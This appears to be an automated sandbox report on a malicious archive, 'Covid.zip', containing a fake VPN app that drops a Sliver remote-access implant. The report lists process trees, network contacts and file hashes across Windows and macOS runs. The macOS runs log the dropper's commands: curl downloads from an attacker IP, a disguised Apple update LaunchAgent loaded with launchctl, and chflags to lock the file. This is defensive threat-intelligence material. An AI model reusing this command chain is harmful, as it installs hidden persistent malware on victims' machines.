Malware Analysis Report

2024-11-13 13:23

Sample ID 241107-w9c14sxcjh
Target Covid.zip
SHA256 809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa
Tags
evasion execution exfiltration persistence sliver
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa

Threat Level: Known bad

The file Covid.zip was found to be: Known bad.

Malicious Activity Summary

evasion execution exfiltration persistence sliver

Sliver RAT v2

Sliver family

Exfiltration Over Alternative Protocol

Launch Agent

Resource Forking

Enumerates physical storage devices

Launchctl

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 18:36

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

93s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\covid

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\covid

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241101-en

Max time kernel

69s

Max time network

104s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]

Signatures

N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/Covid/covid]

/bin/zsh

[/bin/zsh -c /Users/run/Covid/covid]

/Users/run/Covid/covid

[/Users/run/Covid/covid]

/usr/libexec/xpcproxy

[xpcproxy com.apple.WebKit.WebContent.1812A28A-CD94-4C3D-8BD5-FBB8D909FA3F 480]

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent

[/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent]

/usr/libexec/xpcproxy

[xpcproxy com.apple.ViewBridgeAuxiliary]

/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary

[/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary]

/usr/libexec/xpcproxy

[xpcproxy com.apple.Safari.SafeBrowsing.Service]

/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service

[/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service]

/usr/libexec/xpcproxy

[xpcproxy com.apple.secinitd]

/usr/libexec/secinitd

[/usr/libexec/secinitd]

/usr/libexec/xpcproxy

[xpcproxy com.apple.audio.systemsoundserverd]

/usr/sbin/systemsoundserverd

[/usr/sbin/systemsoundserverd]

/usr/libexec/xpcproxy

[xpcproxy com.apple.pbs]

/System/Library/CoreServices/pbs

[/System/Library/CoreServices/pbs]

/usr/libexec/xpcproxy

[xpcproxy com.apple.audio.AudioComponentRegistrar]

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar

[/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

Network

Country Destination Domain Proto
US 8.8.8.8:53 16-courier.push.apple.com udp
SG 46.137.201.254:8001 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
GB 172.217.169.42:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp

Files

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db

MD5 d3a1859e6ec593505cc882e6def48fc8
SHA1 f8e6728e3e9de477a75706faa95cead9ce13cb32
SHA256 3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c
SHA512 ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db

MD5 0e4a0d1ceb2af6f0f8d0167ce77be2d3
SHA1 414ba4c1dc5fc8bf53d550e296fd6f5ad669918c
SHA256 cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030
SHA512 1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/malware,osx,url_expression

MD5 cb2bf504bb348394c22535f53d84dd54
SHA1 73ff1adbf189c97ed6eab0ee36d977e621949250
SHA256 8477ac495618b09c50b6abc999c82e5091d8492a4aa93ae7ef38d1b1a0555400
SHA512 36d68bdc794ceec2be7740c90add4c3f97bab0b422f9949e006214ffff2a9ab4b6eca2b973f9083627ce0c21da9c5d5c58eb9f0b985b03dcfef406d5b7a9515b

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/social_engineering,osx,url_expression

MD5 2f050ca4ed7d18af575a9cc6df2ade1c
SHA1 d9ad8939146ee1131bd80c45d769a527874d328a
SHA256 2e3b088f86354c4e39fd6d2bb5975a6c6ebfe80aea8789562f24a6a21165b46a
SHA512 2d13ddb65439f6243ef7ac214960941c845bd9a4ef5882bd727af6814951f854faf3d00dcc4c1d42063dc012ca03b058dfea3a02c1e69911a6150de76af88f30

/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/unwanted_software,osx,url_expression

MD5 5715fc0b6092d43b2aa14608956c9746
SHA1 7e7abf3ca08e836e18336f14292460ce6ccebe16
SHA256 cc974e5143c41e37fce62413a4cee2ef12b3484ef7e926bba7630059f42cb2d2
SHA512 b9238e3934207a2e24b1b21ac7f9459fe101c67c35564318bd4264b43145458b16eafa568a5f6e2a5d1be095d20fe470324a494f587e423bcf475903a9822aef

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

147s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\softwareupdated

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\softwareupdated

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241106-en

Max time kernel

65s

Max time network

148s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]

Signatures

N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/Covid/softwareupdated]

/bin/zsh

[/bin/zsh -c /Users/run/Covid/softwareupdated]

/Users/run/Covid/softwareupdated

[/Users/run/Covid/softwareupdated]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

Network

Country Destination Domain Proto
US 8.8.8.8:53 21-courier.push.apple.com udp
SG 46.137.201.254:8888 tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp
SG 46.137.201.254:8888 tcp

Files

/var/db/nsurlstoraged/dafsaData.bin

MD5 64f469698e53d0c828b7f90acd306082
SHA1 bcc041b3849e1b0b4104ffeb46002207eeac54f3
SHA256 d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
SHA512 a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\vpn.dmg

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\vpn.dmg

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:39

Platform

macos-20241101-en

Max time kernel

80s

Max time network

99s

Command Line

[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]

Signatures

Exfiltration Over Alternative Protocol

exfiltration
Description Indicator Process Target
N/A curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated N/A N/A
N/A curl -L http://46.137.201.254/covid -o /Users/run/covid N/A N/A

Launch Agent

persistence

Resource Forking

evasion
Description Indicator Process Target
N/A /bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script N/A N/A

Launchctl

execution
Description Indicator Process Target
N/A launchctl start softwareupdated N/A N/A
N/A launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]

/bin/bash

[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]

/usr/bin/sudo

[sudo /bin/zsh -c open /Volumes/vpn/vpn.app]

/bin/zsh

[/bin/zsh -c open /Volumes/vpn/vpn.app]

/usr/bin/open

[open /Volumes/vpn/vpn.app]

/usr/libexec/xpcproxy

[xpcproxy com.apple.softwareupdate.2324]

/Volumes/vpn/vpn.app/Contents/MacOS/vpn

[/Volumes/vpn/vpn.app/Contents/MacOS/vpn]

/bin/bash

[/bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script]

/usr/bin/uname

[uname -m]

/bin/mkdir

[mkdir /Users/run/.androids]

/usr/bin/curl

[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod a+x /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/bin/launchctl

[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/usr/libexec/xpcproxy

[xpcproxy softwareupdated]

/bin/launchctl

[launchctl start softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated]

/usr/bin/chflags

[chflags uchg /Users/run/.androids/softwareupdated]

/usr/bin/curl

[curl -L http://46.137.201.254/covid -o /Users/run/covid]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated -D]

Network

Country Destination Domain Proto
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 e6858.dscx.akamaiedge.net udp
SG 46.137.201.254:80 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

147s

Max time network

149s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\MacOS\vpn

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\MacOS\vpn

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241106-en

Max time kernel

77s

Max time network

147s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]

Signatures

Exfiltration Over Alternative Protocol

exfiltration
Description Indicator Process Target
N/A curl -L http://46.137.201.254/covid -o /Users/run/covid N/A N/A
N/A curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated N/A N/A

Launch Agent

persistence

Resource Forking

evasion
Description Indicator Process Target
N/A /bin/bash /Users/run/vpn.app/Contents/Resources/script N/A N/A

Launchctl

execution
Description Indicator Process Target
N/A launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist N/A N/A
N/A launchctl start softwareupdated N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]

/bin/zsh

[/bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]

/Users/run/vpn.app/Contents/MacOS/vpn

[/Users/run/vpn.app/Contents/MacOS/vpn]

/bin/bash

[/bin/bash /Users/run/vpn.app/Contents/Resources/script]

/usr/bin/uname

[uname -m]

/bin/mkdir

[mkdir /Users/run/.androids]

/usr/bin/curl

[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

/bin/chmod

[chmod a+x /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/bin/launchctl

[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/usr/libexec/xpcproxy

[xpcproxy softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated -D]

/bin/launchctl

[launchctl start softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated]

/usr/bin/chflags

[chflags uchg /Users/run/.androids/softwareupdated]

/usr/bin/curl

[curl -L http://46.137.201.254/covid -o /Users/run/covid]

Network

Country Destination Domain Proto
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 e6858.dscx.akamaiedge.net udp
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp

Files

/var/db/nsurlstoraged/dafsaData.bin

MD5 64f469698e53d0c828b7f90acd306082
SHA1 bcc041b3849e1b0b4104ffeb46002207eeac54f3
SHA256 d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
SHA512 a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

win11-20241007-en

Max time kernel

91s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\Resources\script

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\Resources\script

Network

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-07 18:36

Reported

2024-11-07 18:40

Platform

macos-20241106-en

Max time kernel

114s

Max time network

145s

Command Line

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]

Signatures

Exfiltration Over Alternative Protocol

exfiltration
Description Indicator Process Target
N/A curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated N/A N/A
N/A curl -L http://46.137.201.254/covid -o /Users/run/covid N/A N/A

Launch Agent

persistence

Resource Forking

evasion
Description Indicator Process Target
N/A /Users/run/vpn.app/Contents/Resources/script N/A N/A
N/A sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/Resources/script\"" N/A N/A
N/A sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script N/A N/A
N/A /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script N/A N/A

Launchctl

execution
Description Indicator Process Target
N/A launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist N/A N/A
N/A launchctl start softwareupdated N/A N/A

Processes

/bin/sh

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]

/bin/bash

[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]

/usr/bin/sudo

[sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]

/bin/zsh

[/bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]

/Users/run/vpn.app/Contents/Resources/script

[/Users/run/vpn.app/Contents/Resources/script]

/usr/bin/uname

[uname -m]

/bin/mkdir

[mkdir /Users/run/.androids]

/usr/bin/curl

[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]

/usr/libexec/xpcproxy

[xpcproxy com.apple.nsurlstoraged]

/usr/libexec/nsurlstoraged

[/usr/libexec/nsurlstoraged --privileged]

/bin/chmod

[chmod a+x /Users/run/.androids/softwareupdated]

/bin/chmod

[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/bin/launchctl

[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]

/usr/libexec/xpcproxy

[xpcproxy softwareupdated]

/bin/launchctl

[launchctl start softwareupdated]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated -D]

/Users/run/.androids/softwareupdated

[/Users/run/.androids/softwareupdated]

/usr/bin/chflags

[chflags uchg /Users/run/.androids/softwareupdated]

/usr/bin/curl

[curl -L http://46.137.201.254/covid -o /Users/run/covid]

/usr/libexec/xpcproxy

[xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E]

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService

[/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService]

Network

Country Destination Domain Proto
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 b._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 db._dns-sd._udp.0.0.127.10.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 itunes.apple.com udp
GB 23.74.160.23:443 itunes.apple.com tcp
SG 46.137.201.254:80 tcp
US 8.8.8.8:53 lb._dns-sd._udp.0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 cds.apple.com udp
US 23.192.22.130:443 cds.apple.com tcp
US 8.8.8.8:53 help.apple.com udp
GB 2.23.221.174:443 help.apple.com tcp
GB 2.23.221.174:443 help.apple.com tcp

Files

/var/db/nsurlstoraged/dafsaData.bin

MD5 64f469698e53d0c828b7f90acd306082
SHA1 bcc041b3849e1b0b4104ffeb46002207eeac54f3
SHA256 d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
SHA512 a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f